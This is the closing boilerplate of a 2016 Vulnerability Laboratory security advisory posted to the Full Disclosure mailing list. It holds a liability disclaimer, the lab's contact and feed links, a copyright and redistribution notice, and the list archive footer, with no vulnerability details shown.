consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ